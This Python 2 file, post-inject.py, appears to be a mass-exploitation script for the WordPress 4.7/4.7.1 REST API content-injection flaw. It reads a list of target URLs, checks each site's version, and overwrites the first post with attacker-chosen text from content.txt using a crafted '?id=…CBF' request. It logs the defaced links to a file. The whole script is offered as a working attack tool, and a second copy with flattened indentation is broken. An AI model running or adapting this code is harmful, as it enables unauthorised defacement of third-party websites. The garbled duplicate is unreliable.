0xv/post-inject.py

## post-inject.py
import re, json, urllib2, sys

class WpContent:
	def __init__(self, url):
		self.__url = url
		self.__response = urllib2.urlopen(self.__url).read()

	def get_api_wp(self):
		return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]

	def get_wp_version(self):
		check_version = re.findall(r'ver=(.*)"', self.__response)[0]
		if check_version == "4.7" or check_version == "4.7.1":
			check_version += " ( Maybe vulnerable to inject ) "
		else:
			check_version += " ( Maybe not vulnerable to inject ) "
		return check_version

	def get_wp_post_information(self):
		get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
		load_info = json.loads(get_post)
		return load_info[0]

	def inject_content(self, id_content, content):
		data = json.dumps({
			'title':"Blah blah",
			'slug':"blah-blah",
			'content':content
			})
		params = {'Content-Type':'application/json'}
		full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
		req = urllib2.Request(full_url, data, params)
		resp = urllib2.urlopen(req).read()
		return json.loads(resp)

	def save(self,url):
		file = open('result.txt','a')
		file.write(url+'\n')
		file.close


def main():
	if len(sys.argv) < 2:
		sys.exit(1)

	with open(sys.argv[1], 'r') as targets:
		targets = targets.read().splitlines()

	with open('content.txt', 'r') as content:
		content = content.read()
	for url in targets:
		try:
			wp = WpContent(url)
			wp_version = wp.get_wp_version()
			post_info = wp.get_wp_post_information()
			print('=========================================')
			print('{0} WP Version: {1}'.format(url,wp_version))
			print('Try Inject ID: {0}').format(post_info['id'])
			inject = wp.inject_content(post_info['id'], content)
			wp.save(inject['link'])
			print('Post updated: '+inject['link'])
			print('=========================================')

		except Exception as e:
			print e


if __name__ == '__main__':
	main()
	import re, json, urllib2, sys

	class WpContent:
	def __init__(self, url):
	self.__url = url
	self.__response = urllib2.urlopen(self.__url).read()

	def get_api_wp(self):
	return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]

	def get_wp_version(self):
	check_version = re.findall(r'ver=(.*)"', self.__response)[0]
	if check_version == "4.7" or check_version == "4.7.1":
	check_version += " ( Maybe vulnerable to inject ) "
	else:
	check_version += " ( Maybe not vulnerable to inject ) "
	return check_version

	def get_wp_post_information(self):
	get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
	load_info = json.loads(get_post)
	return load_info[0]

	def inject_content(self, id_content, content):
	data = json.dumps({
	'title':"Blah blah",
	'slug':"blah-blah",
	'content':content
	})
	params = {'Content-Type':'application/json'}
	full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
	req = urllib2.Request(full_url, data, params)
	resp = urllib2.urlopen(req).read()
	return json.loads(resp)

	def save(self,url):
	file = open('result.txt','a')
	file.write(url+'\n')
	file.close


	def main():
	if len(sys.argv) < 2:
	sys.exit(1)

	with open(sys.argv[1], 'r') as targets:
	targets = targets.read().splitlines()

	with open('content.txt', 'r') as content:
	content = content.read()
	for url in targets:
	try:
	wp = WpContent(url)
	wp_version = wp.get_wp_version()
	post_info = wp.get_wp_post_information()
	print('=========================================')
	print('{0} WP Version: {1}'.format(url,wp_version))
	print('Try Inject ID: {0}').format(post_info['id'])
	inject = wp.inject_content(post_info['id'], content)
	wp.save(inject['link'])
	print('Post updated: '+inject['link'])
	print('=========================================')

	except Exception as e:
	print e


	if __name__ == '__main__':
	main()